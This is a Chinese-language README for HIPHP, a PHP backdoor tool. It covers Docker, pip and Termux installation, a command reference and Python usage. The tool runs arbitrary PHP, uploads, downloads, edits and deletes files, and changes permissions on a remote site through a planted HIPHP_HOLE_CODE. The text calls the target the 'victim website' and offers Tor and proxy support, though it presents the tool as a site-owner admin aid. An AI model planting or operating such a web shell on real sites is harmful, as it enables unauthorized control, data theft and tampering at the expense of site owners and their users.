🚨 新版本可用!
WebHole 现已支持 所有主流 Web 语言。
在 GitHub 上查看:WebHole on GitHub
免费且开源的项目,用于创建后门以控制基于 PHP 的网站。
HIPHP 后门是一个开源工具,允许通过 HTTP/HTTPS 协议远程控制使用 PHP 编程语言的网站。通过使用 80 端口的 POST/GET 方法,用户可以访问一系列功能,例如文件下载和编辑。此外,它还提供连接 Tor 网络的能力,通过使用密码保护提供额外的安全层。
HIPHP 由一群网站管理员开发,他们希望在不依赖第三方软件或服务的情况下,对自己的网站拥有更大的控制权。它是一个简单且用户友好的解决方案。通过在网站目录结构中的任意 PHP 文件中放置 HIPHP_HOLE_CODE,用户将获得从世界上任何地方进行更改的访问权限。这使得它成为希望在线管理时拥有更大灵活性的网站所有者的理想解决方案。
安全性是 HIPHP 的首要任务,定期更新确保与流行内容管理系统(CMS)使用的不同 PHP 代码库版本的兼容性。其密码保护功能增加了额外一层防御,防止未经授权的访问。HIPHP 是一个安全的解决方案,适合那些希望重新完全控制自己网站托管环境的人。
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t hiphp:latest
<p>点击查看 <a href="https://asciinema.org/a/QRlMY6JH9uwMCIbaV7F6lLoQ1">演示</a></p><br>
<br>
<h4>从 Docker Hub 拉取、构建并运行:</h4>```bash
# Pull:
❯ docker pull yasserbdj96/hiphp:latest
# Build:
❯ docker build -t docker.io/yasserbdj96/hiphp:latest .
# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t docker.io/yasserbdj96/hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
点击查看演示
❯ docker build -t ghcr.io/yasserbdj96/hiphp:latest .
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t ghcr.io/yasserbdj96/hiphp:latest
<p>点击查看 <a href="https://asciinema.org/a/wDWAVo5GURsAbCUVseZsN2PdY">演示</a></p><br>
<br>
<h2>安装:</h2>
<h4>Python 包安装:</h4>```bash
# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp
# Local install:
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install
#❯ pip install -r requirements.txt
❯ pip install .
# Uninstall:
❯ pip uninstall hiphp
❯ cd hiphp
❯ cd install
❯ bash install.sh --install ❯ hiphp
❯ bash install.sh --update
❯ bash install.sh --uninstall
<br>
<h4>Termux 安装:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# Go to Installation folder:
❯ cd install
# Install:
❯ bash install.sh --termux --install
❯ hiphp
# Update:
❯ bash install.sh --termux --update
# Usage: hiphp [OPTION]
# Examples:
# hiphp --help # Show CLI help for hiphp.
# hiphp --geth [KEY] [URL] # Retrieve the HIPHP_HOLE_CODE encrypted by your [KEY].
# hiphp [KEY] [URL] # Connect to the victim's website in CLI mode.
# hiphp --version # Check the current version number.
# Uninstall:
❯ bash install.sh --termux --uninstall
❯ cd hiphp
❯ bash build_deb.sh
❯ sudo dpkg -i hiphp-.deb
❯ sudo apt install ./hiphp-.deb
<br>
<h2>无需安装即可运行:</h2>
<h4>使用 hiphp-cli 运行:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# default run on any os:
❯ python main.py --KEY="<KEY*>" --URL="<URL*>"
# Run with Makefile:
❯ make ARGUMENTS="--KEY='<KEY*>' --URL='<URL*>'" run
# For linux:
❯ cd hiphp-linux
❯ bash hiphp-cli.sh --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-cli.bat --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
--help, help # Display this help. --help [ACTIONS], help [ACTIONS] # Help for a specific command. --geth, geth # Get the HIPHP_HOLE_CODE (same purpose as --geth). --phpinfo, phpinfo # Display information about the server. --cls, cls # Clear the console. --exit, exit # Exit the console.
Actions:
--ls, ls # List files and folders (current directory by default). Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH] --ls # List all files and folders in the current directory. --ls [PATH] # List all files and folders in the specified directory. --ls -all # List all files, folders, and subfolders in the current directory. --ls -all [PATH] # List all files, folders, and subfolders in the specified directory.
--cat, cat # Concatenate a file to standard output. Usage: --cat [FILE_PATH]
--set, set # Create a code snippet that is always saved during work. Usage: --set [PHP_CODE] To reset to the initial value, use "--dset" or "dset".
--cd, cd # Change directory. Usage: --cd [PATH]
--rf, rf, run # Run code from a file. Usage: --rf [FILE_PATH] [VARIABLES] --rf [FILE_PATH] # Run code from a file. --rf [FILE_PATH] [VARIABLES] # Run code from a file with variables (e.g., --rf example.php var==hello).
--up, up, upload # Upload a file. Usage: --up [FILE_PATH] [PATH] --up [FILE_PATH] # Upload a file to the current directory. --up [FILE_PATH] [PATH] # Upload a file to a specified directory.
--down, down, download # Download a file. Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH] --down -f [FILE_PATH] # Download a file to the current directory. --down -f [FILE_PATH] [OUT_PATH] # Download a file to a specified directory. --down -d [DIR_PATH] # Download a folder to the current directory. --down -d [DIR_PATH] [OUT_PATH] # Download a folder to a specified directory. --down -all # Download all files to the current directory. --down -all [OUT_PATH] # Download all files to a specified directory.
--zip, zip # Compress a directory. Usage: --zip [DIR_PATH] --zip # Compress the current directory. --zip [DIR_PATH] # Compress a specific directory.
--edt, edt, edit # Edit files. Usage: --edt [FILE_PATH] CTRL+q # Exit the editor. CTRL+s # Save the changes.
--rm, rm, delete # Delete files and folders. Usage: --rm [-f/-d] [FILE/DIR_PATH] --rm -f [FILE_PATH] # Delete a file. --rm -d [DIR_PATH] # Delete a folder.
--mv, mv # Move files and folders. Usage: --mv [SOURCE] [DESTINATION]
--chmod, chmod # change file/folder permissions Usage: --chmod [PERMISSIONS] [FILE/DIR_PATH]
About:
--update, update # Check for updates. --license, license # View the project license. --about, about # About this project. --version, version # Get the current version number.
<br>
<h4>使用 hiphp-desktop 运行:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# run with hiphp-desktop tool:
❯ python main.py --DST
# Run with Makefile:
❯ make ARGUMENTS="--DST" run
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Linux:
❯ cd hiphp-linux
❯ bash hiphp-desktop.sh
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-desktop.bat
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
❯ cd hiphp
❯ pip install -r requirements.txt ❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os. ❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
❯ python main.py --TK
❯ make ARGUMENTS="--TK" run
❯ make ARGUMENTS="--TK --KEY='' --URL=''" run
❯ cd hiphp-linux ❯ bash run-hiphp-tk.sh
❯ hiphp-win ❯ run-hiphp-tk.bat
<br>
<h2>使用 hiphp 作为脚本:</h2>
<h4>脚本用法:</h4>```python
# install hiphp package:
# ❯ pip install hiphp
# import hiphp package:
from hiphp import *
# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
# PROXIES = To use a proxy.
# RETURN = True for return data as a string, false for print data in the console.
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False, proxies="". #p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser. #p1=hiphp(key="123",url="https://localhost.com/vvv2.php")
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php
p1.run("echo 'this is a test';")
p1.run_file("./examples.php")# Run code from file. p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.
p1.upload("./examples.php")# Upload a file to the current directory. p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.
p1.compress()# Compress the current directory. p1.compress("./example/")# Compress a specific directory.
p1.download("example.zip")# download a specific file to the current directory. p1.download("example.zip","<OUT_PATH>")# download a specific file to specific directory.
p1.cli() #}END.
<br>
<h2>截图:</h2>
<div align="center">
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/26eba0a21247c621a1e22d366ed56aef53e66026deb91c0401f2f0600f5e467c.png" alt="hiphp 社交预览">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot0.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f7e873693e43b2997d506931b6263fc03ddb839b685f75510f8c3319eed26136.png" alt="Linux上的hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot1.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/ab8f73643879f0c6257da8f96f75d162525fec87a1d27a757ff1cd92c9f60676.png" alt="hiphp-cli帮助">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot2.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fcb6cc1affa5fd690891af13697e6354a39292accbb4e9f09c5591e4baec4985.png" alt="安装在Linux上的hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot3.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/bf9b7f1ec5f8bc9fa33c59b864fed6f497d5b624844aa16f76c4e43af8019ce1.png" alt="安装在Termux上的hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot4.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f0e8c087e50616ce47f188195b285d731af64dd79e7da5387bec0077f9346a8f.png" alt="Windows上的hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot14.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/7730738d9028ad2f3c3367bc38b57085946236635df5343308754a86e47b1b31.png" alt="hiphp-cli扫描中">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot5.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/44302c3ddc91b76b81e330a05cd87f3271ad2327d63eca6c46bf2eb84759b826.png" alt="hiphp-desktop登录">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot6.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/e1a1fb6fa6fd04f49c2ef656d42540e9c633e820e9292dcdeb9154dfbdb7bcfa.png" alt="hiphp桌面版">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot7.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/c63d4a141ab36bab58a529216ea78828691535c3581c39ed30ffb77ecd51aca6.png" alt="hiphp桌面版编辑器">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot8.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/5883c9001d4cbdcd2dd0df082a4d8cc81fd766456efd548459fc598541222d2c.png" alt="hiphp桌面版登录深色模式">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot9.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/6f1a39895da6033d29e160360c31b1275997c0f180df371b61507bff3ae12dc9.png" alt="hiphp桌面版深色模式">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot10.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f578c99a0f94623e73e24f5e15a502bc1a5fd0ebab925fc5f0c9b39a499d28d3.png" alt="hiphp桌面版编辑器深色模式">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot11.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/29de8b71c3eb0e494749275cc9b641ee411b8c54f20dd71cba165ae587c301b7.png" alt="hiphp桌面版设置">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot12.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/cfefaeec60064d87318f897e145b6ba6017de9ef11b558c13b1a3cdc92e995ba.png" alt="hiphp-tk登录">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot13.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fe863889f956edac2ba2f30f0e366a29b0ae8d0f6320548093b40a2cd9690180.png" alt="hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot15.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f75a974cfebdfe6d62a01f72e295061a01c8b296d120be9ce145d07fff01c284.png" alt="安装在Linux后的hiphp">
</a>
</div>
<br>
<h2>变更日志历史:</h2>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/CHANGELOG">点击查看变更日志历史</a>
<br>
<h2>限制:</h2>
1. 当你第一次在网站上使用hiphp时,代码HIPHP_HOLE_CODE会显示给你,复制它并上传到你想要连接的路径,例如'https://localhost/inc/example.php'。<br>
2. 为了使hiphp正常工作且无错误,HIPHP_HOLE_CODE必须放置在目标文件的顶部。<br>
3. 如果你没有通过链接输入正确的HIPHP_HOLE_CODE位置路径,hiphp将无法工作并会显示一条消息,说明你无法连接到该网站。<br>
4. 如果你在.onion网站上使用hiphp,你必须运行tor服务或tor浏览器。<br>
5. 如果你是Windows用户,你必须修改"config.ini"文件。<br>
6. 我对你如何使用我的工具/程序/项目不负责任。请遵守法律,不要做愚蠢的事。
<br>
<h2>开发者:</h2>
开发者/作者:[yasserbdj96](https://github.com/yasserbdj96)
<br>
<h2>许可证:</h2>
<p>此存储库的内容受以下<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/LICENSE">LICENSE</a>约束。</p>
<br>
<h2>支持:</h2>
<p>如果你喜欢这个项目并希望看到它不断改进,或者希望我创建更多有趣的项目,请考虑<a href="https://github.com/sponsors/yasserbdj96">赞助我</a>。</p>
<br>
<br>
<p align="center">
<samp>
<a href="https://yasserbdj96.github.io/">website</a> .
<a href="https://github.com/yasserbdj96">github</a> .
<a href="https://gitlab.com/yasserbdj96">gitlab</a> .
<a href="https://www.linkedin.com/in/yasserbdj96">linkedin</a> .
<a href="https://twitter.com/yasserbdj96">twitter</a> .
<a href="https://instagram.com/yasserbdj96">instagram</a> .
<a href="https://www.facebook.com/yasserbdj96">facebook</a> .
<a href="https://www.youtube.com/@yasserbdj96">youtube</a> .
<a href="https://pypi.org/user/yasserbdj96">pypi</a> .
<a href="https://hub.docker.com/u/yasserbdj96">docker</a> .
<a href="https://t.me/yasserbdj96">telegram</a> .
<a href="https://gitter.im/yasserbdj96/yasserbdj96">gitter</a> .
<a href="mailto:[email protected]">e-mail</a> .
<a href="https://github.com/sponsors/yasserbdj96">sponsor</a>
</samp>
</p>
| 分发版 | 版本检查 | Python 版本 | 安装方式 | hiphp-cli | hiphp-desktop | hiphp-tk |
|---|
| Ubuntu | 最新版本 | 3.7 --> 3.11 | ✓ | ✓ | ✓ | ✓ |
| Windwos | 最新版本 | 3.7 --> 3.11 | ✗ | ✓ | ✓ | ✓ |
| MacOS | 最新版本 | 3.7 --> 3.10 | ✗ | ✓ | ✓ | ✓ |
| Android-termux | 最新版本 | 3.7 --> 3.9 | ✓ | ✓ | ✗ | ✗ |
| Nethunter | 最新版本 | 3.7 --> 3.9 | ✓ | ✓ | ✓ | ✗ |